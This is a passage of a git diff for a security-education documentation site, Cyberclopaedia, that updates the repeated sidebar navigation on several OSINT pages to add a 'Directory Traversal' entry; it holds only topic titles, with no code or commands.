        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -209,22 +209,6 @@

Common oper - - diff --git a/docs/Reconnaissance/OSINT/Harvesting E-Mails.html b/docs/Reconnaissance/OSINT/Harvesting E-Mails.html index b8442d30..1e533fb6 100644 --- a/docs/Reconnaissance/OSINT/Harvesting E-Mails.html +++ b/docs/Reconnaissance/OSINT/Harvesting E-Mails.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -218,22 +218,6 @@

Other tools

- - diff --git a/docs/Reconnaissance/OSINT/Instagram User Enumeration.html b/docs/Reconnaissance/OSINT/Instagram User Enumeration.html index 7d713ad7..81d69ba6 100644 --- a/docs/Reconnaissance/OSINT/Instagram User Enumeration.html +++ b/docs/Reconnaissance/OSINT/Instagram User Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Reconnaissance/OSINT/Tools/index.html b/docs/Reconnaissance/OSINT/Tools/index.html index 28f71a8d..a647f30a 100644 --- a/docs/Reconnaissance/OSINT/Tools/index.html +++ b/docs/Reconnaissance/OSINT/Tools/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
